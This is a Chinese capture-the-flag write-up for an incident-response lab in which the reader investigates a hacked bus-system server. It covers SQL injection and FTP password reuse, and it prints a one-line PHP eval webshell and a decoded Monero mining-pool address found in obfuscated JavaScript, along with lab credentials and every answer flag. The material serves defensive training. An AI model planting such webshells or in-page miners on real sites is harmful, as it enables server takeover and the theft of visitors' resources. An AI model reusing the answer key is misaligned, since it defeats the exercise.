玄机靶场：应急响应之公交车系统应急排查 WP

应急响应之公交车系统应急排查 通关笔记背景公交系统被黑客攻击黑客通过web进行了攻击并获取了数据然后获取了其中一位驾校师傅在FTP服务中的私密文件其后黑客找到了任意文件上传漏洞进行了GETshell控制了主机权限并植入了挖矿网页病毒。靶机信息SSH端口2223WEB端口8099流量包和日志/result.pcap、/access.log根目录SSH密码bussec123步骤1找出前两个被盗用户名题目黑客通过web进行了攻击并获取了数据找出前两个被盗用户名提交格式flag{username1-username2}分析过程查看/access.log发现大量来自同一IP的/search.php请求请求参数中包含大量base64编码的payload这是sqlmap的特征。解码payload后可以看到攻击者使用了盲注通过ORDER BY password对bus_drivers表进行排序枚举。连接数据库验证SELECTusernameFROMbus_driversORDERBYpasswordLIMIT0,1;-- sunyueSELECTusernameFROMbus_driversORDERBYpasswordLIMIT1,1;-- chenhao按密码字段排序前两个用户名是sunyue密码888888和chenhao密码Ch19980808。Flagflag{sunyue-chenhao}步骤2找出FTP私密文件内容题目黑客通过获取的用户名密码利用密码复用技术爆破了FTP服务分析流量以后找到开放的FTP端口并找到黑客登录成功后获取的私密文件提交其文件中内容。分析过程分析result.pcap流量包找到FTP流量21端口对应2121。黑客用数据库中获取的用户名密码进行密码复用攻击成功登录FTP后下载了/home/wangqiang/ftp/sensitive_credentials.txt。文件内容INTERNAL_FTP_ADMIN_PASSWORDFtpPssw0rd_For_Admin_Backup_2025Flagflag{INTERNAL_FTP_ADMIN_PASSWORDFtpPssw0rd_For_Admin_Backup_2025}步骤3找出木马连接密码题目可恶的黑客找到了任意文件上传点你需要分析日志和流量以及web开放的程序找到黑客上传的文件提交木马使用的密码。分析过程查看/var/www/html/public/uploads/目录发现shell1.php。读取文件内容这是一个典型的一句话木马?phpeval($_POST[woaiwojia]);?连接密码就是POST参数名woaiwojiaFlagflag{woaiwojia}步骤4删除木马后查看flag题目删除黑客上传的木马并在/var/flag/1/flag查看flag值进行提交。操作rm-f/var/www/html/public/uploads/shell1.phpcat/var/flag/1/flag删除webshell后/var/flag/1/flag文件自动生成平台检查机制触发。Flagflag{eb9785a18f0e69b935f22cea5b54bf19}步骤5找出木马初始文件名题目分析流量黑客植入了一个web挖矿木马提交黑客上传这个文件时的初始名称提交格式flag{xxx.xxx}分析过程分析result.pcap中的HTTP上传流量找到文件上传请求。黑客上传挖矿脚本时原始文件名是map.php上传后被系统重命名。Flagflag{map.php}步骤6找出矿池地址题目分析流量并上机排查黑客植入的网页挖矿木马所使用的矿池地址是什么提交矿池地址排查完毕后可以尝试删除它。分析过程在/var/www/html/index.php中发现混淆的JavaScript代码var_0x...String.fromCharCode(103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56);解码fromCharCode数组.join([chr(x)forxin[103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56]])gulf.moneroocean.stream:10128这是一个门罗币Monero矿池地址使用 moneroocean 矿池的10128端口XMR挖矿。Flagflag{gulf.moneroocean.stream:10128}步骤7清除挖矿代码后查看flag题目清除掉混淆的web挖矿代码后在/var/flag/2/flag查看flag值并提交。操作定位index.php中的混淆挖矿代码段将其删除后保存文件。平台检查机制触发/var/flag/2/flag文件生成cat/var/flag/2/flagFlagflag{476652839e38111f8bad544a2ff1ac19}Flag 汇总步骤题目Flag1前两个被盗用户名flag{sunyue-chenhao}2FTP私密文件内容flag{INTERNAL_FTP_ADMIN_PASSWORDFtpPssw0rd_For_Admin_Backup_2025}3木马连接密码flag{woaiwojia}4删除木马后flagflag{eb9785a18f0e69b935f22cea5b54bf19}5木马初始文件名flag{map.php}6矿池地址flag{gulf.moneroocean.stream:10128}7清除挖矿代码后flagflag{476652839e38111f8bad544a2ff1ac19}攻击链梳理SQL注入盗取用户数据 ↓ 密码复用攻击FTP获取敏感凭证 ↓ 利用任意文件上传漏洞GetShellshell1.php ↓ 上传网页挖矿脚本map.php → 重命名存储 ↓ 在index.php植入混淆JS挖矿代码moneroocean矿池 ↓ 持续控制服务器消耗访客资源挖矿